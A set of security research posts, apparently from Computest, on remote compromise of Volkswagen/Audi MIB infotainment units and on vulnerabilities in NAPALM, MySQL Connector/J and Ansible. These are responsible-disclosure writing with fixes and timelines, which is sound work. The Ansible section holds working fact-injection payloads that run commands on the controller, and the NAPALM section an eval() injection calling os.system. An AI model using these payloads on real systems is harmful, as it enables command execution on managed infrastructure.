The RCC unit is a separate chip in the MIB system. The MIB IVI is a modular platform, where all the multimedia handling is separated from the low-level functions. The MMX (multimedia applications unit) processor is responsible for things like the satnav, screen and input control, and multimedia handling, while the RCC (radio and car control unit) processor handles the low-level communication.

RCC runs the same version of QNX. It has even fewer tools available, and only a few hundred kilobytes of RAM. But because of the Qnet protocol it is possible to run all tools from the MMX unit on RCC.

Communication with the lower-level components, like DAB+, CAN and AM/FM decoding, is handled via serial connections, either SPI or I2C. The various configuration options can be found under /etc/.

Car-Net

We expected to find a cellular connection on RCC, but we did not. After further research it turned out that the Car-Net functionality is offered by a completely separate unit, and not the IVI. The cellular connection in the Golf is connected to a box which is located behind the instrument cluster, as is shown below.

The Car-Net box uses an embedded SIM card. Since this box offered no other interface options, and we couldn’t make any physical changes to the car (to see if JTAG was available for example), we did not investigate any further.

Audi A3

From here we decided to put our effort back into the Audi A3. It uses the same IVI system, but a higher-end version. This version has a physical SIM card, which is used by the Audi connect service. We had of course already done a port scan via the Wi-Fi hotspot, which turned up empty, but the results might be different via the cellular connection.

To test this, we needed to be able to do a port scan on the remote interface. This is possible if the ISP assigns a publicly routable (unfirewalled) IPv4 address or allows client-to-client communication, or by using a hacked femtocell. We chose the first option, using functionality offered by one of the largest ISPs in the Netherlands: they will assign a public IPv4 address if you change certain APN settings. A port scan on this public IP address gave completely different results than our earlier port scan on the Wi-Fi interface:

$ nmap -p0- -oA md -Pn -vvv -A 89.200.70.122
Starting Nmap 7.31 ( https://nmap.org ) at 2017-04-03 09:14:54 CET
Host is up, received user-set (0.033s latency).
Not shown: 65517 closed ports
Reason: 65517 conn-refused
PORT      STATE    SERVICE    REASON      VERSION
23/tcp    open     telnet     syn-ack     Openwall GNU/*/Linux telnetd
10023/tcp open     unknown    syn-ack
10123/tcp open     unknown    syn-ack
15298/tcp filtered unknown    no-response
21002/tcp open     unknown    syn-ack
22110/tcp open     unknown    syn-ack
22111/tcp open     tcpwrapped syn-ack
23000/tcp open     tcpwrapped syn-ack
23059/tcp open     unknown    syn-ack
32111/tcp open     tcpwrapped syn-ack
35334/tcp filtered unknown    no-response
38222/tcp filtered unknown    no-response
49152/tcp open     unknown    syn-ack
49329/tcp filtered unknown    no-response
62694/tcp filtered unknown    no-response
65389/tcp open     tcpwrapped syn-ack
65470/tcp open     tcpwrapped syn-ack
65518/tcp open     unknown    syn-ack

Nmap done: 1 IP address (1 host up) scanned in 464 seconds

Most services are the same as those on the Golf. Some things may differ (like port numbers), possibly because the Audi has the older model of the MIB IVI system. But, more importantly: our vulnerable service is also reachable, and suffers from the same vulnerability!

An attacker can only abuse this vulnerability if the owner has the Audi connect service, and the ISP in the owner’s country allows client-to-client communication or hands out public IPv4 addresses.

To summarize our research up to this point: we have remote code execution, via the internet, on MMX. From here we can control RCC as well. The next step would be to send arbitrary CAN messages over the bus to see if we can reach any safety critical components.

Renesas V850

The RCC unit is not directly connected to the CAN bus; it has a serial connection (SPI) to a separate chip that handles all CAN communication. This chip is manufactured by Renesas and uses the V850 architecture.

The firmware on this chip doesn’t allow arbitrary CAN messages to be sent; it exposes an API that allows only a select number of messages. Most likely, any vulnerability in the gateway would require us to send a message that is not on that list, meaning we need a way to make the Renesas chip send arbitrary messages on our behalf. The read functionality on the Renesas chip has been disabled, so it is not possible to easily extract the firmware from the chip.

The MIB system does have a software update feature. For this, an SD card, USB stick or CD holding the new firmware must be inserted. The update sequence is initiated by the MMX unit, which is responsible for mounting and handling all removable media. When a new firmware image is found, the update sequence will commence.

The update is signed using RSA, but not encrypted. Signature validation is done by the MMX unit, which will then hand over the appropriate update files for RCC and the Renesas chip. The RCC and Renesas chip will trust that the MMX unit already has performed signature validation, and will thus not revalidate the signature for their new firmware. Updating the Renesas V850 chip can be initiated by the RCC unit (using mib2_ioc_flash).

Firmware images are hard to come by. They are only available for official dealers and not for end-users. However, if one can get a hold of the firmware image, it is theoretically possible to backdoor the original firmware image for the Renesas chip, to allow sending arbitrary CAN messages, and flash this new firmware from the RCC unit.

The figure below shows the attack chain up until this point:

Gateway

By backdooring the Renesas chip we are able to send arbitrary CAN messages on the CAN bus. However, the CAN bus we are connected to is dedicated to the IVI system. It is directly connected to a CAN gateway; a physical device used to firewall/filter CAN messages between the different CAN busses.

The gateway is located behind the steering column and is connected with a single connector which has all the different busses connected.

The firmware for the gateway is signed, so backdooring this chip won’t work, as it would invalidate the signature. Furthermore, reflashing the firmware is only possible from the debug bus (OBD-II port) and not from the IVI CAN bus. If we want to bypass this chip we need to find an exploitable vulnerability in the firmware. Our first step would have been to extract the firmware from the chip using a physical vector. However, after careful consideration we decided to discontinue our research at this point, since continuing could compromise intellectual property of the manufacturer and potentially break the law.

USB vector

After finding the remote vector, we discovered a second vector we had not yet explored. For debugging purposes, the MMX unit recognizes a few USB-to-Ethernet dongles as debug interfaces, which will create an extra networking interface. It seems that this network interface will also serve the vulnerable service. The configuration can be found under /etc/usblauncher.lua:

-- D-Link DUB-E100 USB Dongles
device(0x2001, 0x3c05) {
    driver"/etc/scripts/extnet.sh -oname=en,lan=0,busnum=$(busno),devnum=$(devno),phy_88772=0,phy_check,wait=60,speed=100,duplex=1,ign_remove,path=$(USB_PATH) /lib/dll/devnp-asix.so /dev/io-net/en0";
    removal"ifconfig en0 destroy";
};

device(0x2001, 0x1a02) {
    driver"/etc/scripts/extnet.sh -oname=en,lan=0,busnum=$(busno),devnum=$(devno),phy_88772=0,phy_check,wait=60,speed=100,duplex=1,ign_remove,path=$(USB_PATH) /lib/dll/devnp-asix.so /dev/io-net/en0";
    removal"ifconfig en0 destroy";
};

-- SMSC9500
device(0x0424, 0x9500) {
    -- the extnet.sh script does an exec dhcp.client at the bottom, then usblauncher can slay the dhcp.client when the dongle is removed
    driver"/etc/scripts/extnet.sh -olan=0,busnum=$(busno),devnum=$(devno),path=$(USB_PATH) /lib/dll/devn-smsc9500.so /dev/io-net/en0";
    removal"ifconfig en0 destroy";
};

-- Germaneers LAN9514
device(0x2721, 0xec00) {
        -- the extnet.sh script does an exec dhcp.client at the bottom, then usblauncher can slay the dhcp.client when the dongle is removed
        driver"/etc/scripts/extnet.sh -olan=0,busnum=$(busno),devnum=$(devno),path=$(USB_PATH) /lib/dll/devn-smsc9500.so /dev/io-net/en0";
        removal"ifconfig en0 destroy";
};

But even without this service, telnet is also enabled. The version of QNX that is being used only supports descrypt (DES-based crypt) for password hashing, which has an upper limit of eight characters. One could use a service like crack.sh, which can search the entire key space in less than three days using FPGAs, for only $100. We found out that the passwords change between models/versions, but we think it is doable, both in time and money, to build a dictionary containing the passwords of all different versions of the MIB IVI.
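
The eight-character cap is a property of the DES-based crypt scheme itself: everything after the eighth character is silently ignored. On a Unix system this is easy to verify with Python’s crypt module (deprecated since 3.11 and removed in 3.13):

# Traditional descrypt, selected by the classic two-character salt, only
# looks at the first eight characters of the password.
import crypt

h1 = crypt.crypt("12345678", "ab")
h2 = crypt.crypt("12345678ignored", "ab")
print(h1 == h2)  # True: the ninth character onwards never enters the hash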

This vector seems to work on all models that use the MIB IVI system, regardless of the version. Since VAG has multiple car brands, components like the IVI are often reused between brands. This vector will therefore most likely also work on cars from, for example, Seat and Skoda.

We tested this vector by changing some kernel parameters on a Nexus 5 phone. This can be done without reflashing; only root privileges are required. After plugging in the phone, it will be recognized as an Ethernet dongle, and the MMX unit will initialize a debug interface.

Disclosure process

At Computest we believe in public disclosure of identified vulnerabilities, as users should be aware of the risks related to the use of a specific product or service. At the same time, we consider it our responsibility to ensure that nobody is put at unnecessary risk and no unnecessary damage is caused by such a disclosure. That means we are fully committed to a responsible disclosure policy and are not willing to compromise on that.

As recommended, we decided to contact the manufacturer as soon as we had verified and documented our findings. To do so, we looked for a specific Responsible Disclosure Policy (RDP) on the website of the manufacturer to understand how such a disclosure should be handled from their point of view.

As Volkswagen apparently did not have such an RDP in place, we followed the public Whistleblower System of Volkswagen and contacted the external lawyer they listed. Unlike a typical whistleblower disclosure, we had no interest in nor reason for staying anonymous, and disclosed our identity from the very beginning.

With the help of the external lawyer we got in contact with the quality assurance department of the Volkswagen Group in mid-July 2017. After some initial conference calls we decided together that a face-to-face meeting would be the best format to disclose our findings, and Volkswagen invited us to visit their IT center in Wolfsburg, which we did at the end of August 2017.

Obviously, Volkswagen required some time to investigate the impact and to perform a risk assessment. At the end of October we received their final conclusion: they were not going to publish a public statement themselves, but were willing to review our research post to check whether we had stated the facts correctly; we received that review at the beginning of February 2018. In April 2018, just prior to the release of this post, Volkswagen provided us with a letter that confirms the vulnerabilities and mentions that they have been fixed in a software update to the infotainment system. This means that cars produced since this update are not affected by the vulnerabilities we found. The letter is attached to this report. Based on our experience, however, it seems that cars produced before then are not automatically updated when serviced at a dealer, and are thus still vulnerable to the described attack.

When writing this post, we decided not to provide a full disclosure of our findings. We describe the process we followed, our attack strategy and the system internals, but not the full details of the remotely exploitable vulnerability, as we would consider that irresponsible. This might disappoint some readers, but we are fully committed to a responsible disclosure policy and are not willing to compromise on that.

In addition to the above we would like to mention that we have consulted an experienced legal advisor early on in this project to make sure our approach and actions are reasonable, and to assess potential (legal) consequences.

Future work

The current chain of attack only allows for the sending and receiving of CAN messages on an isolated CAN bus. As this bus is strictly separated from the high-speed CAN bus via a gateway, the current attack vector poses no direct threat to driver safety.

However, if an exploitable vulnerability in the gateway were to be found, the impact would significantly increase. Future research could focus on the security of the gateway, to see if there is any way to either bypass or compromise this device. There are still some attack vectors on the gateway that are definitely worth exploring. However, this should only be explored in cooperation with the manufacturer.

We are also looking into extending our research to other cars. We still have some interesting leads from our preliminary research that we could follow.

Conclusions

Internet-connected cars are rapidly becoming the norm. As with many other developments, it’s a good idea to sometimes take a step back and evaluate the risks of the path we’ve taken, and whether course adjustments are needed. That’s why we decided to pay attention to the risks related to internet-connected cars. We set out to find a remotely exploitable vulnerability, which required no user interaction, in a modern-day vehicle and from there influence either driving behavior or a safety feature.

With our research, we have shown that at least the first is possible. We can remotely compromise the MIB IVI system and from there send arbitrary CAN messages on the IVI CAN bus. As a result, we can control the central screen, speakers and microphone. This is a level of access that no attacker should be able to achieve. However, it does not directly affect driving behavior or any safety system due to the CAN gateway. The gateway is specifically designed to firewall CAN messages and the bus the IVI is connected to is separated from all other components. Further research on the security of the gateway was consciously not pursued.

We argue that the threat of an adversary with malicious intent has long been underestimated. The vulnerability we initially identified should have been found during a proper security test. We understood in our meeting with Volkswagen that, despite it being used in tens of millions of vehicles world-wide, this specific IVI system did not undergo a formal security test and the vulnerability was still unknown to them; our approach also appeared to be new to them. However, in their feedback for this post Volkswagen stated that they already knew about this vulnerability.

Speaking with people within the industry, we are under the impression that attention to security and awareness is growing, but with the efforts mainly focused on the models still in development. Component manufacturers producing critical components, such as brakes, already had security high up in their quality assurance agenda. This focus was not driven by fear of adversaries on the CAN bus, but mainly by protection against component malfunction, which could otherwise result in situations like unintended acceleration.

A remote adversary is new territory for most industrial component manufacturers and, to be mitigated effectively, requires embedding security in the software development lifecycle. This is a movement that started years ago in the AppSec world. It is easier in an environment with automatic testing, continuous deployment and the possibility to quickly apply updates after release. This is not always possible in the hardware industry, due to local regulations and the ecosystem; it often requires coordination between many vendors. But if we want to protect future cars, these are problems we have to solve.

However, what about the cars of today, or cars that shipped last week? They often don’t have the required capabilities (such as over-the-air updates) but will be on our roads for the next fifteen years. We believe they currently pose the real threat to their owners: drive-by-wire technology in cars that are internet-connected, without any way to reliably update the entire fleet at once.

We believe that the car industry in general, since it isn’t traditionally a software engineering industry, needs to look to other industries and borrow security principles and practices. Looking at mobile phones for instance, the car industry can take valuable lessons regarding trusted execution, isolation and creating an ecosystem for rapid security patching. For instance, components in a car that are remotely accessible, should be able to receive and apply verified security updates without user interaction.

We understand that component malfunction is a bigger threat in day-to-day operation. We also understand that having an internet-connected car has its advantages, and we are not trying to reverse this trend. However, we can’t ignore the threats that accompany today’s internet-connected world.

Recommendations

Based on our findings documented in this research post and our overall experience in IoT security we would like to conclude this post with some recommendations to manufacturers, consumers and ethical hackers.

Recommendations for manufacturers

  • The growing number of connected consumer devices is not only providing tremendous opportunities, but also comes along with additional risks which need to be taken care of. The quality of produced goods is not only about mechanical functionality and quality of materials used, but the quality and security of the embedded software is equally important and therefore requires equal attention in terms of quality assurance.
  • It is common practice, especially in the field of electronics, to purchase components from a third party. That does not clear the manufacturer from the responsibility for their quality and security; these components need to be included in thorough quality assurance. The company selling the completed product should be prepared to take responsibility for its security and quality.
  • Even the best quality control cannot prevent mistakes from being made. In such an event, manufacturers should stand by their responsibility and communicate swiftly and transparently with affected customers. Hiding issues can not only lead to damages on the customer side, but can also have a very negative impact on the manufacturer’s reputation.
  • Ethical hackers should not be considered as a threat, but as a help to identify existing vulnerabilities. These people often have different views and approaches, enabling them to find vulnerabilities which otherwise would remain undiscovered. Such identified vulnerabilities are important to improve the product quality.
  • Every manufacturer should have a Responsible Disclosure Policy (RDP) stating clearly how external people can report discovered vulnerabilities in a safe manner. Ethical hackers should not be threatened but encouraged to disclose findings to the manufacturer. See also the ‘NCSC Leidraad Responsible Disclosure’.

Recommendations for consumers

  • Having an internet-connected car brings a number of advantages, mostly for consumers. But be aware that this technology is still early in its lifecycle and therefore not yet fully mature in terms of quality and security.
  • This immaturity can translate into relatively easy remote access to your car. Although it is very unlikely that this can impact driving behaviour, it might provide access to personal data stored in the car entertainment system and/or on your smartphone.
  • Become informed: ask about the quality and security standards of the car you are looking into, as much as you do for aspects like crash tests. Specifically, ask about the remote maintenance possibilities and how long the manufacturer will maintain the software used in the car (the support period). If you want to protect yourself against remote threats, ask your dealer to install updates during the normal service schedule.
  • Keep the software in your car up to date where you have the possibility.
  • This does not only apply to cars, but to all IoT devices, such as baby monitors, smart TVs and home automation.

Recommendations for ethical hackers

  • Identifying and disclosing a vulnerability is not about a personal victory or trophy for the hacker, but about a responsibility to contribute to safer and better IT systems.
  • In case you have identified a vulnerability, don’t go further than necessary and make sure you don’t harm anybody.
  • Inform the owner/manufacturer of the identified vulnerability first, and do not share related information with the press or any other third party. Look for a responsible disclosure policy (RDP) on the website of the manufacturer and follow it. In case you can’t find such an RDP, contact the manufacturer (anonymously) and ask for such a policy to help protect your integrity. A good alternative is to look for a whistleblower policy and contact the manufacturer that way.
  • Be aware that what may look like a simple fix from your perspective as an engineer can be something completely different in a manufacturing world, when applied at the scale of hundreds of thousands of vehicles. Have some patience and empathy for the situation you’re putting the manufacturer in, even if you are right to do so.
  • It is important to understand the legal regulations relevant to potential research and investigation activities. Different national legislations and limited relevant jurisdiction do not make that easy. Keep in mind: having no criminal intention does not give you a free ride to break the law. In case of doubt, seek legal advice upfront!

Letter from Volkswagen

Below is the letter from Volkswagen that we received on April 17, 2018. The letter is from the department we have been in contact with from the start of the disclosure process.

NAPALM - command execution on NAPALM controller from host

12 July 2017 at 00:00

During a summary code review of NAPALM, Computest found and exploited several issues that allow a compromised host to execute commands on the NAPALM controller and thus gain access to the other hosts controlled by that controller.

This was not a full audit and further issues may or may not be present.

About NAPALM

NAPALM (Network Automation and Programmability Abstraction Layer with Multivendor support) is a Python library that implements a set of functions to interact with different router vendor devices using a unified API.

NAPALM supports several methods to connect to the devices, to manipulate configurations or to retrieve data.

(Taken from their README)

Technical Background

A big threat to a configuration management system like NAPALM, Ansible, Salt Stack and others is compromise of the central node, or controller. If the controller is compromised, an attacker has unfettered access to all hosts that are controlled by the controller. As such, in any deployment, the central node receives extra attention in terms of security measures and isolation, and threats to this node are taken even more seriously.

Issue: Unsafe eval() when validating configurations

The validator allows for a number comparison using < and >. This is handled by the compare_numeric() function in napalm-base/validator.py. The function assumes that the value retrieved from the router is also a number and uses the eval() function for the actual comparison. However, a compromised device can of course return an arbitrary string, which will be evaluated.

def compare_numeric(src_num, dst_num):
    """Compare numerical values. You can use '<%d','>%d'."""
    complies = eval(str(dst_num)+src_num)
    if not isinstance(complies, bool):
        return False
    return complies
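
To illustrate, here is a hypothetical sketch of the injection; the payload string is our own illustration, but the mechanics are exactly those of compare_numeric(): the device-supplied value is concatenated with the operator and handed to eval().

# src_num is the operator from the validation file; dst_num is supposed to be
# a number read from the device, but a compromised device controls it fully.
src_num = '<90'
dst_num = "__import__('os').system('touch /tmp/pwned') or 0"
complies = eval(str(dst_num) + src_num)  # runs the command, then evaluates 0 < 90
print(complies)                          # True, a bool, so the check passes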

Issue 2: Unsafe eval() in the IOS XR driver

The eval() function is also used quite extensively in the IOS XR driver. Its use case seems to be to transform a string, from the API, which contains true or false to a Python boolean. When the router is compromised however, the string could contain an arbitrary value that is passed to the eval() function. The difficulty in exploiting this would be that the value is first passed to the title() function before it is evaluated as Python code. The title() function capitalizes the first character of each word in a string.

For example:

multipath = eval((napalm_base.helpers.find_txt(
                bgp_group, 'NeighborGroupAFTable/NeighborGroupAF/Multipath') or 'false').title())

napalm_iosxr/iosxr.py#L821
napalm_iosxr/iosxr.py#L952
napalm_iosxr/iosxr.py#L966
napalm_iosxr/iosxr.py#L968
napalm_iosxr/iosxr.py#L970
napalm_iosxr/iosxr.py#L1003
napalm_iosxr/iosxr.py#L1005
napalm_iosxr/iosxr.py#L1145
napalm_iosxr/iosxr.py#L1368
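
The title() call is what makes this case harder (though not impossible) to exploit: it capitalizes the first letter of every alphabetic run, which turns the API’s lowercase booleans into valid Python literals but mangles a naive payload. A quick illustration:

# Intended use: convert the API's "true"/"false" strings into Python literals.
print("false".title())                            # False

# A naive injection payload is mangled by the same transformation:
print("__import__('os').system('id')".title())    # __Import__('Os').System('Id')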

Mitigation

Users that are unable to update can mitigate the issues by not using the < or > validation options and not using the IOS XR driver.

Resolution

Users can update to version 0.24.3 of napalm-base and 0.5.3 of napalm-iosxr, which fixes these vulnerabilities.

Challenge

We have taken the liberty to transform this vulnerability into a CTF challenge for SHA2017. Exploitation is left as an exercise for the reader:

#!/usr/bin/env python2

eval(raw_input().title())

Conclusion

The NAPALM project assumes that all nodes are playing nice. However, this assumption does not hold in a situation where a node is compromised. The project would benefit from a more defensive programming style, where values returned from a node are considered hostile and handled accordingly.

We would like to thank the developers of NAPALM for their quick response. The mentioned vulnerabilities were fixed within 2 hours after our initial email!

Timeline

2017-07-12 First contact with NAPALM developers
2017-07-12 NAPALM released a fix

MySQL Connector/J - Unexpected deserialisation of Java objects

25 April 2017 at 00:00

A malicious MySQL database or a database containing malicious contents can obtain remote code execution in applications connecting using MySQL Connector/J.

Technical Background

MySQL Connector/J is a driver for MySQL adhering to the Java JDBC interface. One of the features offered by MySQL Connector/J is support for automatic serialization and deserialization of Java objects, to make it easy to store arbitrary objects in the database.

When deserializing objects, it is important to never deserialize objects received from untrusted sources. As certain functions are automatically called on objects during deserialization and destruction, attackers can combine objects in unexpected ways to call specific functions, eventually leading to the execution of arbitrary code (depending on which classes are loaded). As the code is often executed as soon as the object is constructed or destructed, additional type-checking on the constructed object is not enough to protect against this.

MySQL Connector/J requires the flag autoDeserialize to be set to true before objects are automatically deserialized, which should only be set when the database and its contents are fully trusted by the application.

Vulnerability

During a short evaluation of the MySQL Connector/J source code, a method was found to deserialize objects from the database even when this flag is not set, through API functions that do not imply the deserialization of objects at all.

The conditions are the following:

  • The flag useServerPrepStmts is set to true. With this flag enabled, the server caches prepared SQL statements and arguments are sent to it separately. As this allows statements to be reused, it is often enabled for increased performance.

  • The application is reading from a column having type BLOB, or the similar TINYBLOB, MEDIUMBLOB or LONGBLOB.

  • The application is reading from this column using .getString() or one of the functions reading numeric values (which are first read as strings and then parsed as numbers). Notably not .getBytes() or .getObject().

When these conditions are met, MySQL Connector/J will check if the data starts with 0xAC 0xED (the magic bytes of a serialized Java object) and if so, attempt to deserialize it and try to convert it to a string.

The vulnerable code:

case Types.LONGVARBINARY:

if (!field.isBlob()) {
    return extractStringFromNativeColumn(columnIndex, mysqlType);
} else if (!field.isBinary()) {
    return extractStringFromNativeColumn(columnIndex, mysqlType);
} else {
    byte[] data = getBytes(columnIndex);
    Object obj = data;

    if ((data != null) && (data.length >= 2)) {
        if ((data[0] == -84) && (data[1] == -19)) {
            // Serialized object?
            try {
                ByteArrayInputStream bytesIn = new ByteArrayInputStream(data);
                ObjectInputStream objIn = new ObjectInputStream(bytesIn);
                obj = objIn.readObject();
                objIn.close();
                bytesIn.close();
            } catch (ClassNotFoundException cnfe) {
                throw SQLError.createSQLException(Messages.getString("ResultSet.Class_not_found___91") + cnfe.toString()
                        + Messages.getString("ResultSet._while_reading_serialized_object_92"), getExceptionInterceptor());
            } catch (IOException ex) {
                obj = data; // not serialized?
            }
        }

        return obj.toString();
    }

src/com/mysql/jdbc/ResultSetImpl.java#L3422-L3450
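
The trigger condition is simply the two magic bytes of the Java serialization format; the signed byte values -84 and -19 in the Java code above are 0xAC and 0xED. The equivalent check, sketched in Python:

# Any BLOB value beginning with the Java serialization stream magic
# (0xAC 0xED) is handed to ObjectInputStream by the driver.
def looks_like_java_serialized(data: bytes) -> bool:
    return len(data) >= 2 and data[0] == 0xAC and data[1] == 0xED

print(looks_like_java_serialized(bytes.fromhex("aced0005")))  # True
print(looks_like_java_serialized(b"just some text"))          # False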

The combination of a column of type BLOB and the vulnerable functions does not follow common best practices for using a database: BLOB columns are meant to store arbitrary binary data, which should be read using .getBytes(). However, there are many scenarios where this can still be exploited by an attacker:

  • An application does not follow best practices and stores text (or numbers) in a column of type BLOB, and an attacker can insert arbitrary binary data into this column (see the sketch after this list).

  • An application is configured to connect to a remote untrusted database or over an unencrypted connection which is intercepted by an attacker.

  • An application has an SQL injection vulnerability which allows an attacker to change the type of a column to BLOB.
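
As a hypothetical sketch of the first scenario (the table, column and credentials below are placeholders, and a real attack would need a full gadget chain for a class on the application’s classpath):

# Plant a value starting with the Java serialization magic in a BLOB column
# that the vulnerable application later reads back via getString().
import mysql.connector  # pip install mysql-connector-python

gadget = bytes([0xAC, 0xED, 0x00, 0x05]) + b"..."  # placeholder, not a working chain

conn = mysql.connector.connect(host="db.example", user="app",
                               password="secret", database="appdb")
cur = conn.cursor()
cur.execute("UPDATE notes SET body = %s WHERE id = 1", (gadget,))
conn.commit()
conn.close()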

Impact

An attacker who is able to abuse this vulnerability can have the application deserialize arbitrary objects. The direct impact is that the attacker can call into any loaded classes. Often, depending on the application, this can be leveraged to gain code execution by calling into loaded classes that perform actions on files or system commands.

Resolution

The vulnerability can be resolved by updating MySQL Connector/J to version 5.1.41 and ensuring the flag autoDeserialize is not set.

Mitigation

This vulnerability can be mitigated on older versions by ensuring the flags autoDeserialize and useServerPrepStmts are not set.

Conclusion

MySQL Connector/J will (under specific conditions) unexpectedly deserialize objects from a MySQL database, allowing remote code execution. This could be used by attackers to escalate access to a database into remote code execution or possibly allow remote code execution by any user who can insert data into a database.

Timeline

2017-01-23: Issue reported to [email protected].
2017-01-23: Received a confirmation that the bug was under investigation.
2017-01-27: Publicly fixed in commit 6189e718de5b6c6115aee45dd7a480081c129d68
2017-02-24: Received an automatic email that a fix is ready and that an advisory will be published in a future Critical Patch Update.
2017-02-28: Fix released in version 5.1.41.
2017-03-24: Received an automatic email that a fix is ready and that an advisory will be published in a future Critical Patch Update.
2017-04-18: Oracle published Critical Patch Update April 2017, without this issue.
2017-04-19: Contacted Oracle to ask if a CVE number has been assigned to this issue.
2017-04-19: Received a reply from Oracle that they were verifying which versions are vulnerable.
2017-04-21: Oracle published revision 2 of the Critical Patch Update of April 2017, including this issue.

Ansible - command execution on Ansible controller from host

9 January 2017 at 00:00

During a summary code review of Ansible, Computest found and exploited several issues that allow a compromised host to execute commands on the Ansible controller and thus gain access to the other hosts controlled by that controller.

This was not a full audit and further issues may or may not be present.

About Ansible

“Ansible is an open-source automation engine that automates cloud provisioning, configuration management, and application deployment. Once installed on a control node, Ansible, which is an agentless architecture, connects to a managed node through the default OpenSSH connection type.” - wikipedia.org

Technical Background

A big threat to a configuration management system like Ansible, Puppet, Salt Stack and others, is compromise of the central node. In Ansible terms this is called the Controller. If the Controller is compromised, an attacker has unfettered access to all hosts that are controlled by the Controller. As such, in any deployment, the central node receives extra attention in terms of security measures and isolation, and threats to this node are taken even more seriously.

Fortunately for team blue, in the case of Ansible the attack surface of the Controller is pretty small. Since Ansible is agent-less and based on push, the Controller does not expose any services to hosts.

A very interesting bit of attack surface, though, is in the Facts. When Ansible runs on a host, a JSON object with Facts is returned to the Controller. The Controller uses these facts for various housekeeping purposes. Some facts have special meaning, like the facts ansible_python_interpreter and ansible_connection. The former defines the command to be run when Ansible is looking for the Python interpreter, the latter determines the host Ansible is running against. If an attacker is able to control the first fact, he can execute an arbitrary command; if he is able to control the second, he can execute on an arbitrary (Ansible-controlled) host. The latter can be set to local to execute on the Controller itself.

Because of this scenario, Ansible filters out certain facts when reading the facts that a host returns. However, we have found 6 ways to bypass this filter.

In the scenarios below, we will use the following variables:

PAYLOAD = "touch /tmp/foobarbaz"

# Define some ways to execute our payload.
LOOKUP = "lookup('pipe', '%s')" % PAYLOAD
INTERPRETER_FACTS = {
    # Note that it echoes an empty dictionary {} (it's not a format string).
    'ansible_python_interpreter': '%s; cat > /dev/null; echo {}' % PAYLOAD,
    'ansible_connection': 'local',
    # Become is usually enabled on the remote host, but on the Ansible
    # controller it's likely password protected. Disable it to prevent
    # password prompts.
    'ansible_become': False,
}

Bypass #1: Adding a host

Ansible allows modules to add hosts or update the inventory. This can be very useful, for instance when the inventory needs to be retrieved from an IaaS platform, as the AWS module does.

If we’re lucky, we can guess the inventory_hostname, in which case the host_vars are overwritten and will be in effect at the next task. If host_name doesn’t match inventory_hostname, it might get executed in the play for the next hostgroup, also depending on the limits set on the command line.

# (Note that when data["add_host"] is set,
# data["ansible_facts"] is ignored.)
data['add_host'] = {
    # assume that host_name is the same as inventory_hostname
    'host_name': socket.gethostname(),
    'host_vars': INTERPRETER_FACTS,
}

lib/ansible/plugins/strategy/__init__.py#L447

Bypass #2: Conditionals

Ansible actions allow for conditionals. If we know the exact contents of a when clause, and we register it as a fact, a special case checks whether the when clause matches a variable. In that case it replaces it with its contents and evaluates them.

# Known conditionals, separated by newlines
known_conditionals_str = """
ansible_os_family == 'Debian'
ansible_os_family == "Debian"
ansible_os_family == 'RedHat'
ansible_os_family == "RedHat"
ansible_distribution == "CentOS"
result|failed
item > 5
foo is defined
"""
known_conditionals = [x.strip() for x in known_conditionals_str.split('\n')]
for known_conditional in known_conditionals:
    data['ansible_facts'][known_conditional] = LOOKUP

Bypass #3: Template injection in stat module

The template module/action merges its results with those of the stat module. This allows us to bypass the stripping of magic variables from ansible_facts, because they’re at an unexpected location in the result tree.

data.update({
    'stat': {
        'exists': True,
        'isdir': False,
        'checksum': {
            'rc': 0,
            'ansible_facts': INTERPRETER_FACTS,
        },
    }
})

lib/ansible/plugins/action/template.py#L39
lib/ansible/plugins/action/template.py#L49
lib/ansible/plugins/action/template.py#L146
lib/ansible/plugins/action/__init__.py#L678

Bypass #4: Template injection by changing jinja syntax

Remote facts always get quoted. set_fact unquotes them by evaluating them. UnsafeProxy was designed to defend against unquoting by transforming jinja syntax into jinja comments, effectively disabling injection.

Bypass the filtering of {{ and {% by changing the jinja syntax. The {{}} is needed to make it look like a variable. This works against:

- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}"

data['ansible_facts'].update({
    'exploit_set_fact': True,
    'ansible_os_family': "#jinja2:variable_start_string:'[[',variable_end_string:']]',block_start_string:'[%',block_end_string:'%]'\n{{}}\n[[ansible_host]][[lookup('pipe', '" + PAYLOAD  + "')]]",
})

Bypass #5: Template injection in dict keys

Strings and lists are properly cleaned up, but dictionary keys are not. This works against:

- set_fact: foo="some prefix {{ansible_os_family}} and/or suffix"
- command: echo "{{foo}}"

The prefix and/or suffix are needed in order to turn the dict into a string, otherwise the value would remain a dict.

data['ansible_facts'].update({
    'exploit_set_fact': True,
    'ansible_os_family': { "{{ %s }}" % LOOKUP: ''},
})

Bypass #6: Template injection using safe_eval

There’s a special case for evaluating strings that look like a list or dict. Strings that begin with { or [ are evaluated by safe_eval. This allows us to bypass the removal of jinja syntax: we use the whitelisted Python to re-create a bit of Jinja template that is interpreted.

This works against:

- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}"

data['ansible_facts'].update({
    'exploit_set_fact': True,
    'ansible_os_family': """[ '{'*2 + "%s" + '}'*2 ]""" % LOOKUP,
})

Issue: Disabling verbosity

Verbosity can be set on the controller to get more debugging information. This verbosity is controlled through a custom fact. A host, however, can overwrite this fact and set the verbosity level to 0, hiding exploitation attempts.

data['_ansible_verbose_override'] = 0

lib/ansible/plugins/callback/default.py#L99
lib/ansible/plugins/callback/default.py#L208

Issue: Overwriting files

Roles usually contain custom facts that are defined in defaults/main.yml, intended to be overwritten by the inventory (with group and host vars). These facts can be overwritten by the remote host, due to the variable precedence. Some of these facts may be used to specify the location of a file that will be copied to the remote host; the attacker may change it to /etc/passwd. The opposite is also true: he may be able to overwrite files on the Controller. One example is the usage of a password lookup where the filename contains a variable.
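
A hypothetical illustration in the style of the payloads above; the fact name app_config is a made-up role default used as the src of a copy task:

# If a role does something like:
#   - copy: src={{ app_config }} dest=/etc/app.conf
# with app_config defined in defaults/main.yml, a malicious host can shadow
# the default via its returned facts and receive an arbitrary controller file:
data['ansible_facts'].update({
    'app_config': '/etc/passwd',
})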

Mitigation

Computest is not aware of mitigations short of installing fixed versions of the software.

Resolution

Ansible has released new versions that fix the vulnerabilities described in this advisory: version 2.1.4 for the 2.1 branch and 2.2.1 for the 2.2 branch.

Conclusion

The handling of Facts in Ansible suffers from too many special cases that allow for the bypassing of filtering. We found these issues in just hours of code review, which can be interpreted as a sign of very poor security. However, we don’t believe this is the case.

The attack surface of the Controller is very small, as it consists mainly of the Facts. We believe that it is entirely possible to solve the filtering and quoting of Facts in a sound way, and that once this has been done, the opportunity for attack in this threat model is very small.

